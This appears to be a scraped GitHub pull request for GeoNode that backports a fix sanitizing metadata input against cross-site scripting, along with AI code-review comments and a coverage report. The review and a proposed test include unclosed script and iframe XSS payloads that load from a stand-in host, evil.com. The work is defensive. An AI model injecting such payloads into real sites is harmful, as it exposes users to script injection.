[Backport 5.0.x] Sanitize metadata input by etj · Pull Request #14343 · GeoNode/geonode

etj · 2026-06-16T14:12:08Z

Sanitize metadata input

Checklist

Reviewing is a process done by project maintainers, mostly on a volunteer basis. We try to keep the overhead as small as possible and appreciate if you help us to do so by completing the following items. Feel free to ask in a comment if you have troubles with any of them.

For all pull requests:

Confirm you have read the contribution guidelines
You have sent a Contribution Licence Agreement (CLA) as necessary (not required for small changes, e.g., fixing typos in the documentation)
Make sure the first PR targets the master branch, eventual backports will be managed later. This can be ignored if the PR is fixing an issue that only happens in a specific branch, but not in newer ones.

The following are required only for core and extension modules (they are welcomed, but not required, for contrib modules):

There is a ticket in https://github.com/GeoNode/geonode/issues describing the issue/improvement/feature (a notable exemption is, changes not visible to end-users)
The issue connected to the PR must have Labels and Milestone assigned
PR for bug fixes and small new features are presented as a single commit
PR title must be in the form "[Fixes #<issue_number>] Title of the PR"
New unit tests have been added covering the changes, unless there is an explanation on why the tests are not necessary/implemented

Submitting the PR does not require you to check all items, but by the time it gets merged, they should be either satisfied or inapplicable.

gemini-code-assist

Code Review

This pull request introduces a new CleanupHandler to sanitize metadata fields from potentially unsafe HTML tags (XSS protection) during deserialization, along with corresponding unit tests and localization updates. The review feedback highlights a critical security vulnerability where unclosed HTML tags can bypass the sanitization regex, suggesting a simplified pattern to catch them. Additionally, the feedback recommends removing redundant list conversions during dictionary and list iterations to improve performance, and adding a unit test to verify the sanitization of unclosed tags.

Important

The consumer version of Gemini Code Assist on GitHub is being sunset. Starting June 18, 2026, new organization installations will be blocked, and all code review activity will officially cease on July 17, 2026.
For more details on the timeline and next steps, please review the Help Documentation.

gemini-code-assist · 2026-06-16T14:14:31Z

+
+
+class CleanupHandler(MetadataHandler):
+    _HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")


The regular expression _HTML_LIKE_PATTERN requires a closing > to match ([^>]*>). This creates a critical security vulnerability (XSS bypass). An attacker can submit an unclosed dangerous tag, such as <script src="http://evil.com/xss.js", which will not be matched by the pattern and thus will bypass sanitization completely. When rendered in the browser, the browser's lenient HTML parser will use subsequent tags in the page to close the unclosed tag and execute the malicious script.

To fix this, simplify the pattern to detect any potential tag start (closed or unclosed), allowing BeautifulSoup to safely parse and decompose it.

Suggested change

_HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

_HTML_LIKE_PATTERN = re.compile(r"<\s*/?\s*[a-zA-Z]")

gemini-code-assist · 2026-06-16T14:14:32Z

+            for key, nested_value in list(value.items()):
+                nested_path = path + [str(key)]
+                value[key] = self._sanitize_instance(nested_value, context, errors, nested_path)
+            return value
+
+        if isinstance(value, list):
+            for idx, nested_value in enumerate(list(value)):


Creating list copies of dictionary items (list(value.items())) and list elements (list(value)) is redundant and inefficient.

Since we are only modifying the values of existing keys in the dictionary and elements in the list without changing their sizes/lengths, we can safely iterate over value.items() and value directly. This avoids unnecessary memory allocation and improves performance.

Suggested change

for key, nested_value in list(value.items()):

nested_path = path + [str(key)]

value[key] = self._sanitize_instance(nested_value, context, errors, nested_path)

return value

if isinstance(value, list):

for idx, nested_value in enumerate(list(value)):

for key, nested_value in value.items():

nested_path = path + [str(key)]

value[key] = self._sanitize_instance(nested_value, context, errors, nested_path)

return value

if isinstance(value, list):

for idx, nested_value in enumerate(value):

gemini-code-assist · 2026-06-16T14:14:32Z

+        self.assertIn("title", context["errors"])
+        self.assertIn("__errors", context["errors"]["title"])
+        self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])


Add a unit test to verify that unclosed dangerous HTML tags (e.g., <script or <iframe without a closing >) are successfully detected and sanitized, preventing future regressions of the XSS bypass vulnerability.

Suggested change

self.assertIn("title", context["errors"])

self.assertIn("__errors", context["errors"]["title"])

self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])

self.assertIn("title", context["errors"])

self.assertIn("__errors", context["errors"]["title"])

self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])

@override_settings(LANGUAGE_CODE="en")

def test_pre_deserialization_sanitizes_unclosed_tags(self):

instance = {

"title": "<script src=http://evil.com/xss.js",

"body": "<iframe src=http://evil.com",

}

context = {"errors": {}}

self.handler.pre_deserialization(self.resource, {}, instance, partial=set(), context=context)

self.assertEqual(instance["title"], "")

self.assertEqual(instance["body"], "")

Copilot

Pull request overview

This PR introduces server-side sanitization of incoming metadata payloads to mitigate HTML/script injection, and adds an i18n thesaurus entry to surface a user-facing warning when sanitization occurs.

Changes:

Add a CleanupHandler that recursively strips HTML-like content from incoming metadata values (pre-deserialization).
Wire the sanitization step into MetadataManager.update_schema_instance() and propagate an errors dict via context.
Add i18n RDF labels for new/updated metadata error messages and add unit tests covering sanitization behavior.

Reviewed changes

Copilot reviewed 4 out of 4 changed files in this pull request and generated 2 comments.

File	Description
geonode/metadata/thesauri/labels-i18n.metadata.rdf	Adds i18n thesaurus concepts/labels including `metadata_error_sanitized`.
geonode/metadata/tests/tests.py	Updates manager-context expectations and adds tests for sanitization/logging/error reporting.
geonode/metadata/manager.py	Injects `errors` into context and calls `CleanupHandler.pre_deserialization()` before handler updates.
geonode/metadata/handlers/meta.py	Implements `CleanupHandler` to sanitize nested strings and record warnings/errors.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

+        with self.assertLogs("geonode.metadata.handlers.meta", level="WARNING") as cm:
+            context = {"errors": {}}
+            self.handler.pre_deserialization(self.resource, {}, instance, partial=set(), context=context)
+
+        self.assertEqual(instance["title"], "xss")
+        self.assertEqual(instance["details"]["body"], "safe")
+        self.assertEqual(instance["items"][1], "bad")
+        self.assertEqual(instance["count"], 3)
+
+        logs = "\n".join(cm.output)
+        self.assertIn("Sanitized potentially unsafe metadata field 'title'", logs)
+        self.assertIn("Sanitized potentially unsafe metadata field 'details.body'", logs)
+        self.assertIn("Sanitized potentially unsafe metadata field 'items.[1]'", logs)
+
+        self.assertIn("title", context["errors"])
+        self.assertIn("__errors", context["errors"]["title"])
+        self.assertIn("metadata_error_sanitized", context["errors"]["title"]["__errors"])


+<?xml version='1.0' encoding='UTF-8'?>
+<rdf:RDF xmlns="http://www.w3.org/2004/02/skos/core#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/">
+  <ConceptScheme rdf:about="https://i18n.geonode.org">


codecov · 2026-06-16T14:27:24Z

Codecov Report

❌ Patch coverage is 96.47059% with 3 lines in your changes missing coverage. Please review.
⚠️ Please upload report for BASE (5.0.x@31b61a6). Learn more about missing BASE report.

Additional details and impacted files

@@           Coverage Diff            @@
##             5.0.x   #14343   +/-   ##
========================================
  Coverage         ?   74.51%           
========================================
  Files            ?      945           
  Lines            ?    56863           
  Branches         ?     7707           
========================================
  Hits             ?    42372           
  Misses           ?    12809           
  Partials         ?     1682

🚀 New features to boost your workflow:

❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

etj self-assigned this Jun 16, 2026

Copilot AI review requested due to automatic review settings June 16, 2026 14:12

cla-bot Bot added the cla-signed CLA Bot: community license agreement signed label Jun 16, 2026

Copilot started reviewing on behalf of etj June 16, 2026 14:12 View session

etj changed the title ~~Sanitize metadata input~~ [Backport 5.0.x] Sanitize metadata input Jun 16, 2026

etj requested a review from giohappy June 16, 2026 14:13

etj added this to the 5.0.3 milestone Jun 16, 2026

gemini-code-assist Bot reviewed Jun 16, 2026

View reviewed changes

Copilot AI reviewed Jun 16, 2026

View reviewed changes

etj force-pushed the p9f9-fj9v-50x branch from ad128fe to 8be7396 Compare June 16, 2026 15:48

Sanitize metadata input

bbf66cc

etj force-pushed the p9f9-fj9v-50x branch from 8be7396 to bbf66cc Compare June 16, 2026 16:26

giohappy approved these changes Jun 17, 2026

View reviewed changes

giohappy merged commit 730d8fa into 5.0.x Jun 17, 2026
13 checks passed

giohappy deleted the p9f9-fj9v-50x branch June 17, 2026 08:30

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

[Backport 5.0.x] Sanitize metadata input#14343

[Backport 5.0.x] Sanitize metadata input#14343
giohappy merged 1 commit into
5.0.xfrom
p9f9-fj9v-50x

etj commented Jun 16, 2026 •

edited

Loading

Uh oh!

gemini-code-assist Bot left a comment

Uh oh!

gemini-code-assist Bot Jun 16, 2026

Uh oh!

gemini-code-assist Bot Jun 16, 2026

Uh oh!

gemini-code-assist Bot Jun 16, 2026

Uh oh!

Copilot AI left a comment

Uh oh!

codecov Bot commented Jun 16, 2026 •

edited

Loading

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants



		class CleanupHandler(MetadataHandler):
		_HTML_LIKE_PATTERN = re.compile(r"<\s/?\s[a-zA-Z][^>]*>")

Conversation

etj commented Jun 16, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Checklist

Uh oh!

gemini-code-assist Bot left a comment

Choose a reason for hiding this comment

Code Review

Uh oh!

gemini-code-assist Bot Jun 16, 2026

Choose a reason for hiding this comment

Uh oh!

gemini-code-assist Bot Jun 16, 2026

Choose a reason for hiding this comment

Uh oh!

gemini-code-assist Bot Jun 16, 2026

Choose a reason for hiding this comment

Uh oh!

Copilot AI left a comment

Choose a reason for hiding this comment

Pull request overview

Reviewed changes

Uh oh!

codecov Bot commented Jun 16, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Codecov Report

Uh oh!

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

3 participants

etj commented Jun 16, 2026 •

edited

Loading

codecov Bot commented Jun 16, 2026 •

edited

Loading